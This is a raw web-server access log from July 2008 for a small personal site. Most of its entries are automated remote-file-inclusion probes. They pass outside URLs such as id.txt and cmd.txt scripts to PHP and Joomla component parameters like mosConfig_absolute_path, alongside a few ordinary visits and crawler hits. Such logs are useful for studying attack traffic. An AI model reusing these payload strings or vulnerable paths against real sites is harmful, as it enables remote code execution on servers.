70.77.43.61 - - [09/Jul/2008:19:57:25 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:57:34 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
62.149.12.122 - - [09/Jul/2008:19:57:46 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
62.149.12.122 - - [09/Jul/2008:19:57:46 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
213.240.250.130 - - [09/Jul/2008:19:57:57 -0500] "GET /logs//atom.php5?page=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:19:58:01 -0500] "GET //atom.php5?page=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.114.141.30 - - [09/Jul/2008:19:59:15 -0500] "GET /logs/?path%5Bdocroot%5D=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 200 90748 "-""libwww-perl/5.805"
85.114.141.30 - - [09/Jul/2008:19:59:15 -0500] "GET /?path%5Bdocroot%5D=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
62.44.72.247 - - [09/Jul/2008:20:00:05 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
62.44.72.247 - - [09/Jul/2008:20:00:05 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
88.255.236.6 - - [09/Jul/2008:20:00:51 -0500] "GET /logs//?pg=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:20:00:52 -0500] "GET //?pg=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
65.91.249.193 - - [09/Jul/2008:20:01:33 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 356 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:01:33 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 356 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:01:33 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 351 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:01:33 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 351 "-""libwww-perl/5.813"
74.52.114.58 - - [09/Jul/2008:20:03:50 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
74.52.114.58 - - [09/Jul/2008:20:03:50 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
88.255.236.6 - - [09/Jul/2008:20:04:36 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:20:04:36 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
82.98.78.92 - - [09/Jul/2008:20:05:07 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.98.78.92 - - [09/Jul/2008:20:05:08 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.240.250.130 - - [09/Jul/2008:20:05:22 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:20:05:23 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:20:05:49 -0500] "GET /logs//ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:20:05:50 -0500] "GET //ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
212.158.128.74 - - [09/Jul/2008:20:09:44 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
212.158.128.74 - - [09/Jul/2008:20:09:45 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
87.229.106.43 - - [09/Jul/2008:20:11:41 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.asa.ba/eng//administrator/components/com_chronocontact/excelwriter/Writer/test.txt??? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
74.6.8.88 - - [09/Jul/2008:20:14:16 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.225.192.5 - - [09/Jul/2008:20:18:32 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
66.225.192.5 - - [09/Jul/2008:20:18:32 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
89.149.194.251 - - [09/Jul/2008:20:19:53 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
74.6.8.88 - - [09/Jul/2008:20:20:33 -0500] "GET /logs/access_log.1161043200 HTTP/1.0" 200 246302 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.72.247 - - [09/Jul/2008:20:21:35 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
62.44.72.247 - - [09/Jul/2008:20:21:35 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
88.255.236.6 - - [09/Jul/2008:20:24:12 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:20:24:13 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
193.252.149.15 - - [09/Jul/2008:20:25:15 -0500] "GET http://tomdolan.pconline.com:80/robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [09/Jul/2008:20:25:17 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.214.44.28 - - [09/Jul/2008:20:26:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [09/Jul/2008:20:26:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
85.234.133.173 - - [09/Jul/2008:20:26:35 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/live.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.811"
85.234.133.173 - - [09/Jul/2008:20:26:36 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/live.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
74.6.8.88 - - [09/Jul/2008:20:26:38 -0500] "GET /logs/access_log.1183593600 HTTP/1.0" 200 266149 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.234.133.173 - - [09/Jul/2008:20:27:25 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/live.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.811"
85.234.133.173 - - [09/Jul/2008:20:27:25 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/live.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
213.186.55.91 - - [09/Jul/2008:20:31:32 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
213.186.55.91 - - [09/Jul/2008:20:31:32 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
216.117.167.157 - - [09/Jul/2008:20:31:46 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.65"
216.117.167.157 - - [09/Jul/2008:20:31:46 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
216.117.167.157 - - [09/Jul/2008:20:31:47 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
62.44.72.247 - - [09/Jul/2008:20:33:22 -0500] "GET /logs//atom.php5?page=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.44.72.247 - - [09/Jul/2008:20:33:23 -0500] "GET //atom.php5?page=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:20:33:23 -0500] "GET /logs/?path%5Bdocroot%5D=http://waktu.pokol.hu/irc/id.txt? HTTP/1.1" 200 90748 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:20:33:24 -0500] "GET /?path%5Bdocroot%5D=http://waktu.pokol.hu/irc/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
89.111.176.28 - - [09/Jul/2008:20:33:48 -0500] "GET /logs/?path%5Bdocroot%5D=%A0http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 200 90748 "-""libwww-perl/5.805"
89.111.176.28 - - [09/Jul/2008:20:33:50 -0500] "GET /logs/?path%5Bdocroot%5D=%A0http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 200 90748 "-""libwww-perl/5.805"
89.111.176.28 - - [09/Jul/2008:20:33:50 -0500] "GET /?path%5Bdocroot%5D=%A0http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.176.28 - - [09/Jul/2008:20:33:51 -0500] "GET /?path%5Bdocroot%5D=%A0http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.23.245.32 - - [09/Jul/2008:20:35:29 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.812"
213.23.245.32 - - [09/Jul/2008:20:35:30 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.812"
81.169.182.113 - - [09/Jul/2008:20:37:55 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.69"
81.169.182.113 - - [09/Jul/2008:20:37:55 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.69"
74.6.8.88 - - [09/Jul/2008:20:39:10 -0500] "GET /logs/access_log.1179964800 HTTP/1.0" 200 139130 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.75.171.20 - - [09/Jul/2008:20:44:12 -0500] "GET /logs//atom.php5?page=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.75.171.20 - - [09/Jul/2008:20:44:13 -0500] "GET //atom.php5?page=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
88.255.236.6 - - [09/Jul/2008:20:46:43 -0500] "GET /logs//atom.php5?page=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:20:46:43 -0500] "GET //atom.php5?page=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.240.250.130 - - [09/Jul/2008:20:47:48 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:20:47:50 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
207.34.179.158 - - [09/Jul/2008:20:48:37 -0500] "GET /logs//index.php?autoLoadConfig%5B999%5D%5B0%5D%5BautoType%5D=include&autoLoadConfig%5B999%5D%5B0%5D%5BloadFile%5D=http://www.cdpm3.com/id.txt??? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
207.34.179.158 - - [09/Jul/2008:20:48:38 -0500] "GET //index.php?autoLoadConfig%5B999%5D%5B0%5D%5BautoType%5D=include&autoLoadConfig%5B999%5D%5B0%5D%5BloadFile%5D=http://www.cdpm3.com/id.txt??? HTTP/1.0" 404 282 "-""libwww-perl/5.48"
74.6.8.88 - - [09/Jul/2008:20:50:09 -0500] "GET /logs/access_log.1156377600 HTTP/1.0" 200 132455 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.91.249.193 - - [09/Jul/2008:20:54:02 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 358 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:54:02 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 358 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:54:02 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 353 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:20:54:02 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 353 "-""libwww-perl/5.813"
71.175.187.151 - - [09/Jul/2008:20:56:27 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.175.187.151 - - [09/Jul/2008:20:56:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.175.187.151 - - [09/Jul/2008:20:57:15 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.175.187.151 - - [09/Jul/2008:20:57:15 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.175.187.151 - - [09/Jul/2008:20:57:15 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.175.187.151 - - [09/Jul/2008:20:57:15 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
213.240.250.130 - - [09/Jul/2008:21:00:06 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
213.240.250.130 - - [09/Jul/2008:21:00:08 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
65.91.249.193 - - [09/Jul/2008:21:01:53 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:01:53 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:01:53 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:01:53 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.108.92.36 - - [09/Jul/2008:21:05:20 -0500] "GET /logs/access_log.1207785600/?path%5Bdocroot%5D=http://waktu.pokol.hu/irc/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:21:05:20 -0500] "GET /?path%5Bdocroot%5D=http://waktu.pokol.hu/irc/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:21:05:22 -0500] "GET /logs/?path%5Bdocroot%5D=http://waktu.pokol.hu/irc/id.txt? HTTP/1.1" 200 90748 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:21:10:50 -0500] "GET /logs/?path%5Bdocroot%5D=http://waktu.hut2.ru/irc/id.txt?? HTTP/1.1" 200 90748 "-""libwww-perl/5.803"
89.108.92.36 - - [09/Jul/2008:21:10:51 -0500] "GET /?path%5Bdocroot%5D=http://waktu.hut2.ru/irc/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
72.52.166.232 - - [09/Jul/2008:21:14:32 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.52.166.232 - - [09/Jul/2008:21:14:32 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.51.132.170 - - [09/Jul/2008:21:14:52 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.51.132.170 - - [09/Jul/2008:21:14:52 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
62.212.90.214 - - [09/Jul/2008:21:15:14 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.212.90.214 - - [09/Jul/2008:21:15:14 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.8.88 - - [09/Jul/2008:21:15:33 -0500] "GET /logs/access_log.1176249600 HTTP/1.0" 200 231534 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.44.72.247 - - [09/Jul/2008:21:18:12 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.72.247 - - [09/Jul/2008:21:18:12 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.55.146.38 - - [09/Jul/2008:21:23:38 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.55.146.38 - - [09/Jul/2008:21:23:38 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.116.36.2 - - [09/Jul/2008:21:24:50 -0500] "GET /logs/errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.116.36.2 - - [09/Jul/2008:21:24:51 -0500] "GET /errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.75.171.20 - - [09/Jul/2008:21:31:41 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.75.171.20 - - [09/Jul/2008:21:31:41 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.91.249.193 - - [09/Jul/2008:21:31:43 -0500] "GET /logs/index.php?site1=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:31:43 -0500] "GET /logs/index.php?site1=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:31:43 -0500] "GET /index.php?site1=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:21:31:43 -0500] "GET /index.php?site1=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
62.75.165.197 - - [09/Jul/2008:21:47:16 -0500] "GET /logs//components/com_chronocontact/excelwriter/Writer/Format.php=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
62.75.165.197 - - [09/Jul/2008:21:47:16 -0500] "GET //components/com_chronocontact/excelwriter/Writer/Format.php=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 392 "-""libwww-perl/5.803"
194.79.75.195 - - [09/Jul/2008:21:49:12 -0500] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 294 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
65.214.45.147 - - [09/Jul/2008:21:53:40 -0500] "GET /tattoo/tat_1st HTTP/1.0" 200 13916 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
195.135.183.134 - - [09/Jul/2008:21:55:35 -0500] "GET /logs//ashnews.php?pathtoashnews=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.0" 404 289 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
195.135.183.134 - - [09/Jul/2008:21:55:35 -0500] "GET /logs/errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.0" 404 287 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
195.135.183.134 - - [09/Jul/2008:21:55:36 -0500] "GET //ashnews.php?pathtoashnews=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.0" 404 284 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
195.135.183.134 - - [09/Jul/2008:21:55:36 -0500] "GET /errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.0" 404 282 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
88.255.236.6 - - [09/Jul/2008:21:56:08 -0500] "GET /logs/access_log.1207785600//?pg=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
88.255.236.6 - - [09/Jul/2008:21:56:08 -0500] "GET //?pg=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
